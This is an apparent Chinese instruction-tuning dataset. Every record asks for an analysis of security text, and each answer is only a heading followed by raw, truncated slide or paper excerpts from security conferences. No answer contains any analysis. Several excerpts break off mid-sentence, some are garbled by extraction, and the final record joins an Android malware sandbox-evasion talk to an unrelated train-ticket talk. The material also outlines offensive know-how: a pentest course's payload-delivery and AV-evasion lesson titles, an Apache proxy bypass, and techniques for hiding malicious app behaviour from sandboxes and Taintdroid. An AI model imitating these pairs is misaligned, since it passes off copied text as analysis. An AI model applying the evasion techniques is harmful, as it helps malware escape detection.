{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n8/20/14 Open Source and CSIRT - What can we do?- Presented by: Yoshiki Sugiura, CSIRT Evangelist Shin Adachi, CISSP, CISM, CISA, PMP Congratulations HITCON on your 10th Anniversary! FIRST OF ALL 8/20/14 This presentation ONLY reflects personal views and opinions of the presenters, NOT presenters affiliations IN ANY WAY, including but not limited to their employers, customers, associations, and so on. DISCLAIMER  CSIRT Evangelist  JPCERT/CC from 1998 to 2002  NTT-CERT, Intelli-CSIRT  Steering committee of Nippon CSIRT Association.  GNU/Linux, Emacs  Guest researcher of Meiji Univ.  Team building  Theory of management and Social psychology AGENDA PRESENTED BY 8/20/14  Silicon Valley InfoSec Geek  FIRST Education Committee Chair  CISSP, CISM, CISA, and PMP  NTT-CERT  ENISA Expert/Working Groups  Info Security consultant  Contributed to:  NIST SP 500-291 and *293  Liberty Alliance Presence Services, eGov Profile v1, IAF, Strong Authentication etc.  ITU-T: NGN Security and IdM PRESENTED BY AND.. MISSING HIM, WHO CANT COME TODAY..  IT gadget otaku  Photographer  Consultant  vi/emacs  grep/sed/awk  Debian/Linux  OS X  Father 8/20/14 AGENDA Issues on OSS Roles of CSIRT OSS Security Tools AGENDA Issues on OSS Roles of CSIRT OSS Security Tools 8/20/14 Source: https://translate.google.com/#auto/zh-TW/vulnerability VULNERABILITY Root cause of most cyber security incidents VULNERABILITY 8/20/14 Source: https://twitter.com/apbarros/status/481157619261116416/photo/1 CASE #1- WORLDCUP 2014 CASE #1- WORLDCUP 2014 Source: https://twitter.com/apbarros/status/481157619261116416/photo/1 8/20/14 SOFTWARE VULNERABILITIES Source: 25 Years of Vulnerabilities: 1988-2012 by sourcefire How many Apache related vulnerabilities were published in 2012 and 2013? 2014 (as of July 31) 2013: 2012: QUIZ 135 129 67 Source: http://www.osvdb.org/search?search[vuln_title]=apache&search[text_type]=alltext 8/20/14 CVE-2013-1966 CASE #2 Vulnerability  in Apache Struts 2 before version 2.3.14.1  allows remote ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking Autonomic Networks 2 #sh run o o o 3 Agenda o o o o 4 Autonomic Systems o o 5 Autonomic Network o o o o Autonomic Network logo as shown by Cisco in their presentations here and here 6 Live Demo 7 Demo Results o o o 8 Cisco Deployment o o o o 9 Channel Discovery o o 10 Adjacency Discovery o o o o o 11 Adjacency Discovery Registrar Enrollee Generate 3072-bit RSA key 12 Secure Channel o o o o o o o 13 Registrar Configuration autonomic registrar domain-id ERNW.de whitelist flash:whitelist.txt CA local no shut autonomic 14 Enrollee Needed Configuration o o o o autonomic 15 Autonomic Effect o o o o o o o 16 Are you in Control? 17 Autonomic Network: Under The Hood 18 Channel Discovery 19 Channel Discovery 20 Channel Discovery 21 Channel Discovery 22 Channel Discovery 23 Channel Discovery 24 Channel Discovery 25 Channel Discovery 26 Adjacency Discovery 27 Adjacency Discovery 28 Adjacency Discovery 29 Adjacency Discovery 30 Adjacency Discovery 31 Adjacency Discovery 32 Adjacency Discovery 33 Adjacency Discovery 34 Adjacency Discovery 35 Adjacency Discovery 36 Adjacency Discovery 37 Adjacency Discovery 38 Adjacency Discovery 39 Adjacency Discovery 40 Secure Channel 41 Secure Channel o o o  42 43 Is it Secure? 44 Live Chat Support 45 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! 46 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Thanks for reporting, we created BugID CSCvd15717. We will check with the BU for that 47 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Hi, the BU responded that as both have a certificate signed by same CA, then they can connect. 48 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Hi, the BU responded that as both have a certificate signed by same CA, then they can connect. Me: Wait, w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2007 Savid Technologies, Inc. All Rights Reserved DEFCON 15 Analyzing Intrusions & Intruders A Deeper look at a psychological approach towards network analysis Sean M. Bodmer Savid Technologies, Inc. sbodmer@savidtech.com Copyright 2007 Savid Technologies, Inc. All Rights Reserved !!Updated Presentation!!  This slide deck is different from your CD  I will provide an updated brief to DEFCON for further review  Thanks in advance! Copyright 2007 Savid Technologies, Inc. All Rights Reserved Introductions  Who am I?  Sean M. Bodmer  Savid Technologies, Inc.  Honeynet Researcher & Intrusion Analyst  Information Security/Criminal Sciences Researcher  Over a decade working in Information Security  Not an expert Behavioral Profiler!  A Intrusion Analyst by trade  Studies signatures and observables of Intrusions  Building a thesis on Attacker/Threat Profiling Copyright 2007 Savid Technologies, Inc. All Rights Reserved Why am I here?  To enable you to walk away with alternative concepts and methods to better perform intrusion analysis and attacker characterization of cyber crimes and cyber criminals Copyright 2007 Savid Technologies, Inc. All Rights Reserved Everyone's Challenge  What can you do as a Security Professional to protect your assets and better understand threats?  How do you learn from attackers and threats?  How can you use this to properly analyze the motives, intent, and behaviors?  How can you prevent further attacks and generate stronger protections?  How do you effectively communicate your findings to senior leadership? Copyright 2007 Savid Technologies, Inc. All Rights Reserved Overall Foundations  Behavioral Profiling  Generally profiling has negative connotations, but this is the l Generally profiling has negative connotations, but this is the literal iteral term term   Assumptions of Profiling Assumptions of Profiling  The rational relies on the uniqueness of experience & different personality types will be reflected in lifestyles & behaviors. T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CATCHING MALWARE EN MASSE: DNS AND IP STYLE Dhia Mahjoub (@DhiaLite) dhia@opendns.com Thibault Reuille (@ThibaultReuille) thibault@opendns.com Andree Toonk (@atoonk) andree@opendns.com Abstract The Internet is constantly growing, providing a myriad of new services, both legitimate and malicious. Criminals take advantage of the scalable, distributed, and rather easily accessible naming, hosting and routing infrastructures of the Internet. As a result, the battle against malware is raging on multiple fronts: the endpoint, the network perimeter, and the application layer. The need for innovative measures to gain ground against the enemy has never been greater. In this paper, we present novel strategies to catch malware at the DNS and IP level, as well as our unique 3D visualization engine. We will describe the detection systems we built, and share several successful war stories about hunting down malware domains and associated rogue IP space. At the DNS level, we describe efficient methods for tracking fast flux botnets and describe a study we carried for several months of the Zeus fast flux proxy network. At the IP level, classical reputation methods assign \"maliciousness\" scores to IPs, BGP prefixes, or ASNs by merely counting domains and IPs. Our system takes an unconventional approach that combines two opposite, yet complementary views and leads to more effective predictive detections. On one hand, we abstract away from the ASN view. We build the AS graph and investigate its topology to uncover hotspots of malicious or suspicious activities and monitor our DNS traffic for new domains hosted on these malicious IP ranges. We will also describe a unique method of identifying seemingly autonomous networks that are actually operated by one organization, which helps further identify potentially malicious areas of the Internet. On the other hand, we examine a granularity finer than the BGP prefix. For this, we zero in on IP ranges re-allocated or re- assigned to bad cus", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### [第十一课工具介绍Veil-Evasion](../Chapter1/11_工具介绍Veil-Evasion.md) ### [第十二课基于UDP发现内网存活主机](../Chapter1/12_基于UDP发现内网存活主机.md) ### [第十三课基于ARP发现内网存活主机](../Chapter1/13_基于ARP发现内网存活主机.md) ### [第十四课基于第十课补充payload1](../Chapter1/14_基于第十课补充payload1.md) ### [第十五课基于第十课补充payload2](../Chapter1/15_基于第十课补充payload2.md) ### [第十六课红蓝对抗渗透测试1](../Chapter1/16_红蓝对抗渗透测试1.md) ### [第十七课红蓝对抗渗透测试2](../Chapter1/17_红蓝对抗渗透测试2.md) ### [第十八课红蓝对抗渗透测试3](../Chapter1/18_红蓝对抗渗透测试3.md) ### [第十九课基于netbios发现内网存活主机](../Chapter1/19_基于netbios发现内网存活主机.md) ### [第二十课基于snmp发现内网存活主机](../Chapter1/20_基于snmp发现内网存活主机.md)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow To Get Your Message Out Bruce Sutherland - KO4IN DEFCON 19 When Your Government Turns Off The Internet Bruce Sutherland - KO4IN DEFCON 19 /usr/bin/whoami  Information Systems field 20+ years  Designed and implemented networks since ARCNet was standard  Writing code professionally 15+ years  Licensed Ham Radio operator 8+ years  Much prefer UNIX-ish OSs over Microsoft-anything  Severe disdain for government interference  Information Systems field 20+ years  Designed and implemented networks since ARCNet was standard  Writing code professionally 15+ years  Licensed Ham Radio operator 8+ years  Much prefer UNIX-ish OSs over Microsoft-anything  Severe disdain for government interference Bruce Sutherland, KO4IN  DEFCON 19 About Ham Radio  Old tech circa 1900  Need at least 2 skilled operators at either end  Typically need favorable ionosphere conditions  Or  Old tech circa 1900  Need at least 2 skilled operators at either end  Typically need favorable ionosphere conditions  Or Bruce Sutherland, KO4IN  DEFCON 19 = ~ $6,000.00 = ~ $4,000.00 A Monster Station = ~ $4,000.00 = ~ $10,000.00 Bruce Sutherland, KO4IN  DEFCON 19 Equipment we will use  Yaesu VX-8R ~ $350.00  Handheld yagi ~ $50.00 Bruce Sutherland, KO4IN  DEFCON 19 Obtaining a Ham Radio License  Easy for anyone with ½ a brain  Only need a Technician class license to do the things in this talk  Study the ARRL (arrl.org) study guide  Memorize the test online (not recommended)  Take the test (check arrl.org for times & locations)  Wait for FCC to post your license record  Once a call-sign is assigned.Youre Good To Go!  Easy for anyone with ½ a brain  Only need a Technician class license to do the things in this talk  Study the ARRL (arrl.org) study guide  Memorize the test online (not recommended)  Take the test (check arrl.org for times & locations)  Wait for FCC to post your license record  Once a call-sign is assigned.Youre Good To Go! Bruce Sutherland, KO4IN  DEFCON 19 Ham Radio tech we will use  VHF Band (144", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCU-DevSecOps 实践白皮书 中国联合网络通信有限公司研究院 2021 年 9 月 CU-DevSecOps 实践白皮书 1 前言 万物互联的数字智能世界推动着全球数字经济的高速发展随 着云原生应用大数据应用产业互联网以及物联网智能应用软件 的不断发展传统的软件开发流程已不能适应快速变化的业务和迭 代需要于是敏捷开发流程应运而生敏捷开发通过增量和迭代式 的开发模式可以大大缩短软件的交付周期并能进行持续改进从 而能够很好地响应快速的需求更改以及外部环境变化近年来敏捷 开发的广泛应用和云计算技术的快速发展促进着开发和运维的同 步优化并进一步形成了 DevOps即开发运维一体化DevOps 极大 的提升了软件的交付速度但快速的软件交付能力给软件安全性及 可靠性带来了极大挑战因此为了弥补 DevOps 流程中安全保护行 为缺失的问题需要在 DevOps 中融合便捷有效的安全行为完善 DevOps构建 DevSecOps CU-DevSecOps 实践白皮书除介绍 DevOps 面临的安全挑战以 及 DevSecOps 的价值意义发展现状和支撑体系之外还结合 DevSecOps 落地过程中面临的挑战给出了 DevSecOps 的实践指南 该实践指南将 DevSecOps 的可执行实践分为安全文化建设阶段安 全防护左移阶段安全工具链构建阶段和安全运营阶段并对不同 阶段安全活动和安全措施及方法进行了重点介绍和剖析最后对 DevSecOps 的未来发展趋势进行了展望 CU-DevSecOps 实践白皮书 2 参与编写单位 中国联合网络通信有限公司研究院中国联合网络通信有限公司 广东省分公司深圳开源互联网安全技术有限公司绿盟科技集团 股份有限公司杭州孝道科技有限公司北京中科天齐信息技术有 限公司苏州棱镜七彩信息科技有限公司北京小佑科技有限公司 北京安普诺信息技术有限公司 主要撰稿人 徐雷 张小梅 郭新海 黎宇 薛强 郑明 贺文轩 严雪伦 刘军 徐锋 但吉兵 高琳 蓝鑫冲 丁攀 刘安 苏俐竹 袁曙光 刘斌 董毅 刘一赫 CU-DevSecOps 实践白皮书 3 目录 一 DevSecOps 概述 ....................................................................................................................... 4 1.1 DevOps 面临的挑战 ............................................................................................................ 4 1.2 DevSecOps 的价值意义 ..................................................................................................... 5 1.3 DevSecOps 发展现状 ......................................................................................................... 6 1.4 DevSecOps 支撑体系 ......................................................................................................... 7 二 DevSecOps 落地挑战 ............................................................................................................... 9 2.1 组织维度的挑战 .................................................................................................................. 10 2.2 流程维度的挑战 .................................................................................................................. 11 2.3 技术维度的挑战 .............................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napache proxy 0x00 proxyapache proxyPass /test/ \"http://172.28.66.94/\" proxyPassReverse /test/ \"http://172.28.66.94/\" ip/ url8000url proxyPass /test/ \"http://www.baidu.com\" proxyPassReverse /test/ \"http://www.baidu.com\" URL /test/.cn http://www.baidu.com.cn http://www.baidu.com.cn dnsrebindssrf 0x01 mod_proxy.cap_proxy_trans_match950 proxy:realuse_uri+len real http://172.28.66.94 use_uri /test/:8000 len6len lenr-urifakefake /test/ r-uri /test/:8000 alias_match static int alias_match(const char *uri, const char *alias_fakename) { const char *end_fakename = alias_fakename + strlen(alias_fakename); const char *aliasp = alias_fakename, *urip = uri; const char *end_uri = uri + strlen(uri); while (aliasp < end_fakename && urip < end_uri) { if (*aliasp == '/') { /* any number of '/' in the alias matches any number in * the supplied URI, but there must be at least one... */ if (*urip != '/') return 0; while (*aliasp == '/') ++aliasp; while (*urip == '/') ++urip; } else { /* Other characters are compared literally */ if (*urip++ != *aliasp++) return 0; } } /* fixup badly encoded stuff (e.g. % as last character) */ if (aliasp > end_fakename) { aliasp = end_fakename; } if (urip > end_uri) { urip = end_uri; } /* We reach the end of the uri before the end of \"alias_fakename\" * for example uri is \"/\" and alias_fakename \"/examples\" */ if (urip == end_uri && aliasp != end_fakename) { return 0; } /* Check last alias path component matched all the way */ if (aliasp[-1] != '/' && *urip != '\\0' && *urip != '/') return 0; /* Return number of characters from URI which matched (may be * greater than length of alias, since we may have matched * doubled slashes) */ return urip - uri; } return /test/ len6. use_uri+len /test/:8000 6:8000realfound 8000proxyapacheproxy 0x02 //burp /user//details /user/details payload", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMultiplayer Metasploit Tag-Team Pen Testing and Reporting Ryan Linn Defcon 18 Sunday, July 4, 2010 Outline  Description of Problem  Discussion of current solutions  Overview of XMLRPC database integration  Discussion of types of objects  Demos Sunday, July 4, 2010 Whats the problem?  Pen testing/security audit teams need to share information  How do you plan further action?  What about deltas from previous tests?  No easy way to automate reporting Sunday, July 4, 2010 Analysis of current solutions  Dradis - best alternative, imports data great, but hard to further actions, no integration with other tools  Leo - geared toward one person and logging/reporting only  Wiki - multi-user but arbitrary organization, hard to convert to further action or reporting Sunday, July 4, 2010 overview of solution  Metasploit is readily available  Extend XMLRPC to facilitate DB transactions  XMLRPC extension allows central logging  All information is actionable  Data can be added real time Sunday, July 4, 2010 Types of Objects  workspaces - separate spaces for data  hosts  services  vulns  notes - general purpose data storage  events - log of commands executed  loots - phat loots lives here  clients - web clients  users - users + credentials Sunday, July 4, 2010 Workspaces  Values:  name  created_at  updated_at  boundary  description Sunday, July 4, 2010 Hosts  created_at  updated_at  address  address6  mac  comm  name  state  os_name  os_flavor  os_sp  os_lang  arch  purpose  info  comments Sunday, July 4, 2010 Services  host  port  proto  state  name  info Sunday, July 4, 2010 Vulns  host  service  name  info Sunday, July 4, 2010 Notes  ntype  service  host  critical  seen  data Sunday, July 4, 2010 Events  host  name  seen  critical  username  info Sunday, July 4, 2010 loots  host  service  ltype  path  data  content_type  name  info Sunday, July 4, 2010 Clients  host  ua_string  ua_name  ua_ver Sunday, July 4, 2010 Users  username  crypted_password  password_salt  persistance_token", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 SMS Fuzzing  SIM Toolkit Attack Bogdan Alecu bogdalecu@gmail.com www.m-sec.net Abstract In this paper I will show how to make a phone send an SMS message without the users consent and how to make the phone not to receive any message. The method used works on any phone, no matter if its a smartphone or not and also on any GSM/UMTS network. I will present how you can take advantage of sending a special crafted SIM Toolkit command message in order to achieve all that. Finally, I will present the results and their impact on the user and mobile networks security. 1 Introduction SMS stands for Short Message Service and represents a way of communication via text between mobile phones and/or fixed lines, using a standardized protocol. It is an effective way of communication as the user just writes some text and its almost instantly delivered to the destination. SMS as used on modern handsets was originated from radio telegraphy in radio memo pagers using standardized phone protocols and later defined as part of the Global System for Mobile Communications (GSM) series of standards in 1985 as a means of sending messages of up to 160 characters, to and from GSM mobile handsets.1 Since then a lot of things have changed regarding this service and now it can be used for multiple purposes: MMS  Multimedia Messaging Service, OTA  Over The Air  phone configuration, notification for 1 http://en.wikipedia.org/wiki/SMS 2 voice mail, email, fax, micropayments  paying a very small sum of money for different services. All these ways of using SMS can lead to security issues as their implementation isnt fully tested and more important because SMS is like an opened firewall: every phone has it implemented and the phone always receives the message. There have been discovered different errors, security issues related to the SMS: remote DoS for Nokia S60 phones2, phone crashing, rebooting, remote executing EXE files, hijacking mobile data connections3, etc. Until now most of the SMS related s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目录 致谢 前言 目录 第一课windows提权-快速查找exp 第二课Linux提权-依赖exp篇 第三课Delphi代码审计项目实战1 第四课Asp代码审计项目实战2 第五课工具介绍-Sqlmap 第六课反攻的一次溯源项目实战3 第七课sqlserver常用操作远程桌面语句 第八课模拟诉求任务攻击 第九课工具介绍-the-backdoor-factory 第十课msfvenom常用生成payload命令 第十一课工具介绍Veil-Evasion 第十二课基于UDP发现内网存活主机 第十三课基于ARP发现内网存活主机 第十四课基于第十课补充payload1 第十五课基于第十课补充payload2 第十六课红蓝对抗渗透测试1 第十七课红蓝对抗渗透测试2 第十八课红蓝对抗渗透测试3 第十九课基于netbios发现内网存活主机 第二十课基于snmp发现内网存活主机 第二十一课基于ICMP发现内网存活主机 第二十二课基于SMB发现内网存活主机 第二十三课基于MSF发现内网存活主机第一季 第二十四课基于MSF发现内网存活主机第二季 第二十五课基于MSF发现内网存活主机第三季 第二十六课基于MSF发现内网存活主机第四季 第二十七课基于MSF发现内网存活主机第五季 第二十八课基于MSF发现内网存活主机第六季 第二十九课发现目标WEB程序敏感目录第一季 第三十课解决msfvenom命令自动补全 第三十一课msf的前生今世 第三十二课配置vps上的msf 第三十三课攻击Mysql服务 -2- 本文档使用书栈(BookStack.CN)构建 第三十四课攻击Sqlserver服务 第三十五课与Sqlmap结合攻击 第三十六课解决vps上ssh掉线 第三十七课vbs一句话下载payload 第三十八课certutil一句话下载payload 第三十九课vbs一句话下载payload补充 第四十课ftp一句话下载payload 第四十一课bitsadmin一句话下载payload 第四十二课攻击FTP服务 第四十三课js一句话下载payload 第四十四课ertutil一句话下载payload补充 第四十五课解决bat一句话下载payload黑窗 第四十六课powershell一句话下载payload 第四十七课payload分离免杀思路 第四十八课payload分离免杀思路第二季 第四十九课关于Powershell对抗安全软件 第五十课基于SqlDataSourceEnumerator发现内网存活主机 第五十一课项目回忆体系的本质是知识点串联 第五十二课渗透的本质是信息搜集 第五十三课内网渗透中的文件传输 第五十四课基于Powershell做Socks4-5代理 第五十五课与Smbmap结合攻击 第五十六课离线提取目标机hash 第五十七课高级持续渗透-第一季关于后门 第五十八课高级持续渗透-第二季关于后门补充一 第五十九课高级持续渗透-第三季关于后门补充二 第六十课高级持续渗透-第四季关于后门 第六十一课高级持续渗透-第五季关于后门 第六十二课高级持续渗透-第六季关于后门 第六十三课高级持续渗透-第七季demo的成长 第六十四课高级持续渗透-第八季demo便是远控 第六十五课离线提取目标机hash补充 第六十六课借助aspx对payload进行分离免杀 第六十七课meterpreter下的irb操作第一季 第六十八课基于Ruby内存加载shellcode第一季 第六十九课渗透持续渗透后渗透的本质 第七十课ftp一句话下载payload补充 第七十一课基于白名单Msbuild.exe执行payload第一季 -3- 本文档使用书栈(BookStack.CN)构建 第七十二课基于白名单Installutil.exe执行payload第二季 第七十三课基于白名单Regasm.exe执行payload第三季 第七十四课基于白名单Regsvcs.exe执行payload第四季 第七十五课基于白名单Mshta.exe执行payload第五季 第七十六课基于白名单Compiler.exe执行payload第六季 第七十七课基于白名单Csc.exe执行payload第七季 第七十八课基于白名单Msiexec执行payload第八季 第七十九课基于白名单Regsvr32执行payload第九季 第八十课基于白名单Wmic执行payload第十季 第八十一课基于白名单Rundll32.exe执行payload第十一季 第八十二课基于白名单Odbcconf执行payload第十二季 第八十三课基于白名单PsExec执行payload第十三季 第八十四课基于白名单Forfiles执行payload第十四季 第八十五课基于白名单Pcalua执行payload第十五季 第八", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nO P E N S O U R C E FA I R Y D U S T JOHN MENERICK S E C U R I T Y D R A G O N @ N E T S U I T E T H E V I E W S A N D O P I N I O N S E X P R E S S E D H E R E A R E M Y O W N O N LY A N D I N N O WAY R E P R E S E N T T H E V I E W S , P O S I T I O N S O R O P I N I O N S - E X P R E S S E D O R I M P L I E D - O F M Y E M P L O Y E R ( P R E S E N T A N D PA S T ) O R A N Y O N E E L S E . M Y T H O U G H T S A N D O P I N I O N S C H A N G E F R O M T I M E T O T I M E ; T H I S I S A N AT U R A L O F F S H O O T O F H AV I N G A N O P E N A N D I N Q U I S I T I V E M I N D . S E C U R I T Y D R A G O N @ N E T S U I T E T H E V I E W S A N D O P I N I O N S E X P R E S S E D H E R E A R E M Y O W N O N LY A N D I N N O WAY R E P R E S E N T T H E V I E W S , P O S I T I O N S O R O P I N I O N S - E X P R E S S E D O R I M P L I E D - O F M Y E M P L O Y E R ( P R E S E N T A N D PA S T ) O R A N Y O N E E L S E . M Y T H O U G H T S A N D O P I N I O N S C H A N G E F R O M T I M E T O T I M E ; T H I S I S A N AT U R A L O F F S H O O T O F H AV I N G A N O P E N A N D I N Q U I S I T I V E M I N D . WHAT WE ARE NOT TALKING ABOUT WHAT WE ARE TALKING ABOUT THE INTERNET - CIRCA 2007 THE INTERNET - CIRCA 2007 NO ONE SAID IT WAS SECURE NO ONE SAID IT WAS SECURE NO ONE SAID IT WAS SECURE OOPS! OOPS!  O P E N S O U R C E I S M O R E S E C U R E .  OOPS!  O P E N S O U R C E I S M O R E S E C U R E .  OOPS! INTERNET SOCIETY PRESIDENT EVERYBODYS JOB IS NOBODYS JOB EVERYBODYS JOB IS NOBODYS JOB This is a story about four people named EVERYBODYS JOB IS NOBODYS JOB This is a story about four people named Everybody, EVERYBODYS JOB IS NOBODYS JOB This is a story about four people named Everybody, Somebody, EVERYBODYS JOB IS NOBODYS JOB This is a story about four people named Everybody, Somebody, Anybody, and EVERYBODYS JOB IS NOBODYS JOB This is a story about four people named Everybody, Somebody, Anybody, and Nobody. EVERYBODYS JOB IS NOBODYS JOB This is a story about ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity in Cognitive Radio Networks Hunter Scott Latest version of these slides: defcon21.hscott.net + v RF Engineering 101 TV Whitespace Let's break it. Change (or appear to change) the spectrum to force certain decisions Selfish Attack DOS Secondary User Emulation v Primary User Emulation v v Misbehave Attack v Asynchronous Sensing v v Network Endoparasite v Network Ectoparasite v Fabrication v On-Off v Countermeasures Authenticate devices on the network Cooperative Intrusion Detection v Device Reputation Device Location Primary User Emulation v v Why this matters Tools Introducing Level... 30 MHz to 4.4 GHZ 60 mW SimpliciTI Fits Arduino shields ~$100 in quantity Other tools: HackRF by Micheal Ossman MyriadRF What's next", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncp / zet / f9a L A S T E X P L O I T A T I O N About Us  Researchers from TeamT5  Core Developer of ThreatSonar for Linux, macOS, Windows  We mainly focus on state of the art techniques of threat actors and how to effectively identify them 3 Outline 4 Attack Defense Tool  LEAYA: an Embedded System Detection and Response  APT and Botnet Case Studies  Post-Exploitation Techniques  Identifying Threats  SOHO Router Vendors Security Solution APT and Botnet Case Studies 5 BlackTech  Use VPN & DDNS & Virutal Host as C2 server  Use man-in-the-middle attack subnetwork endpoint 6 APT https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Router Compromise Attater Router Tartget PC 7 APT Compromise https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Update Interception Update Server Malicious File Malicious Update 8 APT Update request Interception User https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Payload Delivery Malicious Update File Compromise 9 APT https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Malicious Update Router Slingshot  Compromised Mikrotik router  Downloads and loads malicious DLLs when use Winbox connect to router 10 Winbox User Winbox Mikrotik Router Slingshot 11 APT https://www.kaspersky.com/about/press-releases/2018_slingshot User Winbox Mikrotik Router Slingshot 12 APT https://www.kaspersky.com/about/press-releases/2018_slingshot User Winbox Mikrotik Router Slingshot 13 APT https://www.kaspersky.com/about/press-releases/2018_slingshot User Winbox Mikrotik Router Slingshot 14 APT https://www.kaspersky.com/about/press-releases/2018_slingshot Fancy Bear & VPNFilter (APT28)  VPNFilter use default Cert or 1day to exploit device  Infecting 500k devices.  Modules  htpx: Http Sniffer  ndbr: SSH utility  nm: arp/wireless scan  netfilter: DoS utility  portforwarding  socks5proxy  tcpvpn: reverse-tcp vpn 15 APT https://blog.talosintelligence.com/2018/05/VPNFi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n逃离安卓动态检测 目录  沙盒检测  延时触发  Taintdroid与反隐私检测  自校验与SmaliHook  条件触发  公开沙盒与私有沙盒 沙盒检测  通过手机号码来检测 沙盒检测  通过NetworkOperator名检测 沙盒检测  通过设备ID检测 沙盒检测  通过语言信箱号码检测 沙盒检测  通过ROM编译文件build.prop的信息检测 沙盒检测  通过模拟器没有WIFI支持这个特性来检测 沙盒检测  特定沙盒的检测  写嗅探程序上传到在线分析网站  获取对应的信息(例如手机号)  判断该信息是否为特定沙盒独有的 沙箱的环境特征  bouncer  anubis 检测QEMU  检测qemu的二进制翻译技术(BT)  qemu翻译代码块到宿主机执行  在块执行的内部不会给guest产生中断(切换)  创建2个线程每个线程循环执行一个代码 块 检测QEMU  线程1累加设置全局变量 检测QEMU  线程2打印全局变量的值  由于qemu使用了BT技术,所以输出为固定的值 沙盒反检测  通过SmaliHook对进行关键特征进行随机化 SmaliHook随机化示例  通过对进行关键特征进行随机化 沙盒反检测  动态识别检测沙盒的检测代码 延迟触发  由于样本量的原因, 沙箱在对样本进行安全检测时 受运行时间限制  样本在运行后延迟执行恶意代码  常见可以用来做延迟执行的类函数有  alarm类sleep timer类 message 延迟触发  利用Message延迟30分钟后执行恶意代码 延迟触发的应对  通过smalihook对关键函数进行拦截  缩短延迟函数的时间 Taintdroid与反隐私检测  Taintdroid做了什么  Taintdroid如何做到的  绕过Taintdroid Taintdroid原理  Taintdroid可以监控到加密上传手机号 Taintdroid原理  Taintdroid改写了Dalvik VM用到的一些结构体  加入了自己的标记. Taintdroid原理  拦截获取隐私数据的函数给数据加标记 Taintdroid原理  给数据加标记的函数 Taintdroid原理  charAt时,也会做标记 Taintdroid原理  对于数据移动转换做的处理 Taintdroid原理  在数据外发的点做拦截判断标记  发送短信时判断是否为隐私数据 Taintdroid支持的隐私数据种类 反隐私检测  通过switch/case 给一份没有被标记的数据 Taintdroid与反隐私检测  Taintdroid默认会阻止SO加载 自校验与SmaliHook  SmaliHook  就是把APK文件反编译, 然后对smali代码进行 修改, 把调用的关键系统API改成我们自己实现 的派遣函数  自己的派遣函数做相应的处理或返回假结果  或调用原始函数 SmaliHook  smali 代码hook前 SmaliHook  smali 代码hook后 签名自校验绕过SmaliHook JNI绕过smali hook 条件触发  系统消息触发  用户操作触发  接收指令触发 条件触发  针对条件触发的对策  反编译APK  分析权限接收器  分析smali代码  做对应的行为触发 条件触发  例如在xml文件中扫描到相应的监控短信权 限, 可以向模拟器发送一条短信尝试触发 相关的代码  telnet localhost 5554  sms send +10086 \"hello world\" 公开沙盒与私有沙盒  公开沙盒  隐蔽性差,要做大量随机化操作  私有沙盒  隐蔽性好  若联网,隐蔽性丧失  若断网,大量行为无法触发,需要模拟网络 谢谢大家! 技术追求就是最高成就感 订票助手一日谈 春运是怎么回事  春运是大陆特有的一种在春节和国庆时集 中爆发的客运问题  根本原因在于地区间发展水平差异过大 导致过多人需要背井离乡工作赚取收入  在所有运输方式中铁路作为运力最大最 经济的运输模式但依然满足不了庞大的 运力需求 春运到底有多庞大 为什么订票助手出现了  早期的12306网站有着负载能力的问题在 买票高峰期经常性会提示系统繁忙操 作失败让用户的时间和精力在无形中浪 费  早期的12306网站本身存在漏洞最经典的 漏洞就是验证码漏洞  12306自身作为一个社会服务性的网站本 身的功能欠缺而用户体验也较差 订票助手有什么用  早期的订票助手定位于在系统繁忙的时候 利用系统自身的功能帮助用户自动重新操 作从而节约时间和精力主要包括刷新 查询等着票出来以及在系统繁忙时自动 重新操作  由于购票需求过于旺盛导致虽然功能如 此简单但依然流传很广据估计当时用 户已经上万 订票助手有什么用  由", "category": "text_analysis", "source": "security_papers"}
